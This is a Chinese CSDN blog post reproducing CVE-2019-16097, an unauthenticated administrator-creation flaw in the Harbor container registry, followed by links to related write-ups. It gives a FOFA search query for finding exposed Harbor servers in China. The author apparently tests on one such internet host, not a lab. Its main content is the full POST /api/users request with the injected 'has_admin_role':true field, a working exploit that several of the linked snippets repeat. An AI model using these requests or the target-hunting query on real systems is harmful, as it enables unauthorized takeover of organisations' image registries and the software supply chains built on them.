Harbor未授权创建管理员漏洞(CVE-2019-16097)

最新推荐文章于 2024-01-18 07:15:00 发布
最新推荐文章于 2024-01-18 07:15:00 发布
阅读量1.9k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: cve-2019-16097 harbor 创建管理员
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sojrs_sec/article/details/101778371
版权

环境准备

fofa搜索环境

title="Harbor" && country=CN

找到一个可用环境测试

测试

注册账号,填写账号信息后抓包

POST /api/users HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 111
Connection: close
Referer: https://103.24.179.7/harbor/sign-in?signout=true
Cookie: beegosessionID=c2309d1e5295946e5c1d59e7c63bf5a0

{"username":"whami123","email":"whoami123@qq.com","realname":"whoami123","password":"Whoami123_","comment":"2"}

在包内容里面添加"has_admin_role":true,即

POST /api/users HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 111
Connection: close
Referer: https://103.24.179.7/harbor/sign-in?signout=true
Cookie: beegosessionID=c2309d1e5295946e5c1d59e7c63bf5a0

{"username":"whami123","email":"whoami123@qq.com","realname":"whoami123","password":"Whoami123_","comment":"2","has_admin_role":true}

在这里插入图片描述
放包,使用注册账号登录后即为管理员权限
在这里插入图片描述

sojrs_sec
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Harbor任意管理员注册漏洞(CVE-2019-16097)复现
test\\的博客
10-13 1316
Harbor任意管理员注册漏洞复现 fhh# 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博...
授权访问漏洞总结
LuckySec
03-24 4783
前言:这篇文章主要收集一些常见的授权访问漏洞授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 授权漏洞预览 Active MQ 授权访问 Atlassian Crowd 授权访问 CouchDB 授权访问 Docker 授权访问 Dubbo 授权访问 Druid 授权访问 Elasticsearch 授权访问 FTP 授权访问 Hadoop 授权访问 JBoss 授权访
Harbor 镜像仓库存在授权访问漏洞
whoami
01-16 6314
Harbor 受影响版本中镜像仓库存在访问控制缺陷,攻击者可通过页面搜索镜像名称,绕过登陆验证逻辑,直接查看结果中授权的私有镜像仓库并获取仓库信息(Pull、Push的时间和commit信息,以及镜像存在的漏洞信息等)。本漏洞广泛存在于业界使用的harbor版本中。不过harbor常放置于企业内网,可以缓解该问题。Harbor 是一个开源的 Docker Registry 管理项目,用于托管容器镜像。升级harbor到 2.6.0 或更高版本。
Harbor授权创建管理员
自强不息
07-11 449
人处在幸福与不幸交织的矛盾之中,反而使内心有一种更为深刻的痛苦,看来近在眼前的幸福而实际上又远得相当渺茫,海市蜃楼。放不得抓不住。
Harbor禁用swagger.json(Swagger授权访问漏洞
czm的博客
09-15 2442
VMwareHarbor镜像仓库默认使用了swagger ui,也因此暴露了swagger.json文件。在安全要求高的环境下会触发“Swagger授权访问漏洞”,虽然暴露的信息不是特别关键。但仍然是信息泄露,需要禁用swagger.json的访问。
Harbor授权访问漏洞CVE-2022-46463)
m0_49025459的博客
04-29 6492
是为企业用户设计的容器镜像仓库开源项目,包括了权限管理(RBAC)、LDAP、审计、安全漏洞扫描、镜像验真、管理界面、自我注册、HA等企业必需的功能,同时针对中国用户的特点,设计镜像复制和中文支持等功能。
harbor-offline-installer-v2.7.3.tgz
09-21
当前最新版harbor-v2.7.3 官网地址:https://github.com/goharbor/harbor/releases,可以先尝试从官方下载,如果下载太慢,可以从这里下载。harbor-offline 2.7.3大小753M
harbor-offline-installer-v2.10.1-2.tgz
最新发布
05-06
harbor-offline-installer-v2.10.1_2.tgz 离线安装包
harbor-offline-installer-v1.2.0.tgz
09-08
官方地址 https://github.com/vmware/harbor/releases/download/v1.2.0/harbor-offline-installer-v1.2.0.tgz,可以先尝试从官方下载,如果中断或者下载失败,可以下载此版本...harbor-offline v1.2.0 避免龟速下载安装
harbor-offline-installer-v2.2.1.tgz
04-21
harbor-offline-installer-v2.2.1,2021-4-21 20:53:23
harbor-offline-installer-v2.2.1.zip
04-09
harbor-offline-installer-v2.2.1
Harbor任意管理员注册漏洞复现CVE-2019-16097
ddr12231的博客
09-21 252
注册时抓包 添加poc "has_admin_role":true 管理员权限 POC POST /api/users HTTP/1.1 Host: 127.0.0.1 Content-Length: 131 Accept: application/json Origin: http://127.0.0.1 User-Agent: Opera/9.80 (Windows NT 6....
K8S--解决访问Harbor私有仓库无权限的问题(401 Unauthorized)
IT利刃出鞘的博客
01-18 2432
本文解决K8S访问Harbor私有仓库无权限的问题:401 Unauthorized。
CVE-2019-16097 || Harbor任意管理员注册漏洞复现
Summer's blog
05-13 3689
目录 0x01 前言 0x02 漏洞简介及危害 0x03 漏洞复现 0x04 修复建议 #0x01 前言 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全...
harbor安装_Harbor任意管理员注册漏洞(CVE-2019-16097)
weixin_39790877的博客
11-30 225
0x00 Harbor简介 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。 作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。0x01 原理概述 ...
CVE-2019-16097Harbor任意管理员注册漏洞复现
Sylon的博客
10-10 1087
0x00 Harbor简介 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。 作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。 0x01 原理概述 该漏...
Harbor越权任意管理员注册复现(CVE-2019-16097)
OKAY_TC的博客
01-16 614
核心添加字段:"has_admin_role":true 正常注册: 添加管理员权限字段:"has_admin_role":true
2.授权访问漏洞复现
weixin_52963334的博客
09-08 223
作业。
Harbor任意管理员注册漏洞复现
weixin_43658354的博客
09-23 549
1. 简介 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。 2.影响范围 Harbor: 1.7.0-1.8.2 3.复现 a.语法搜索 我就不写了,自己百度 b.注册,然后抓包 c.改包,在最后数据包加上:“has_admin_role”:true d....
harborCVE-2022-46463
08-12
很抱歉,我找不到关于"harborCVE-2022-46463"的相关信息。可能是因为这个CVE编号不存在或者我没有引用到相关内容。请提供更多细节或者确认你提供的引用内容是否准确。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [GitHub Enterprise Server 存在授权不当漏洞CVE-2022-46258)](https://blog.csdn.net/murphysec/article/details/128640946)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2022-22947 SpringCloud GateWay SPEL RCE 漏洞分析](https://blog.csdn.net/murphysec/article/details/129178607)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值